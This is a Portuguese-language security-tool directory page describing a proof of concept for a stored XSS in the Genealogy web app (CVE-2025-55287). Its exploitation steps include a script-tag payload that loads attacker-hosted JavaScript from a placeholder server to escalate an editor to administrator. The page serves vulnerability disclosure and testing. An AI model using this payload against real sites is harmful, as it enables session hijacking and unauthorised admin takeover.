Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-55287-POC — PoC de escalonamento de privilégio via XSS armazenado autenticado. Afeta versões do Genealogy anteriores à 4.4.0. | Kitploit
Ferramentas/GitHubGitHub/eternalvalhalla/cve-2025-55287-poc
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubeternalvalhalla/cve-2025-55287-poc

CVE-2025-55287-POC

PoC de escalonamento de privilégio via XSS armazenado autenticado. Afeta versões do Genealogy anteriores à 4.4.0.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
11há 1 anoAinda não revisado

CVE-2025-55287-POC

Cross-Site Scripting (XSS) Armazenado e Autenticado no aplicativo Genealogy anterior à versão 4.4.0 permite execução arbitrária de JavaScript e escalada de privilégio do papel Editor+ para Administrador.

Sumário
  • Tipo de vulnerabilidade: Cross-Site Scripting (XSS) Armazenado (CWE-79)
  • Componente afetado: primeiro nome e sobrenome de 'Person'
  • Versões afetadas: Todas as versões anteriores à 4.4.0
  • Impacto: Execução persistente de JavaScript fornecido pelo atacante nos navegadores das vítimas; sequestro de sessão, CSRF via DOM, redesenho de UI, roubo de credenciais ou ações arbitrárias como a vítima
  • Vetor de ataque: Autenticado (qualquer papel com criação de nova pessoa - editor+)
Exploração

Causa raiz: Sanitização/codificação inadequada no lado do servidor do primeiro nome/sobrenome das pessoas ao excluir com sucesso a pessoa afetada por um usuário com privilégios mais altos.

PoC:

  1. Autentique-se no aplicativo (papel editor+).
  2. Crie uma nova pessoa (não precisa necessariamente ser atribuída a nenhuma família).
  3. Inclua o JavaScript como primeiro nome ou sobrenome da pessoa adicionada: <script src='yourserver/poc.js'></script>
  4. Edite o poc.js com seu endereço de e-mail no espaço reservado.
  5. Assim que um usuário privilegiado tentar excluir a pessoa recém-adicionada, você receberá um convite para a plataforma no endereço de e-mail fornecido com o papel de Administrador.
Baixar ferramenta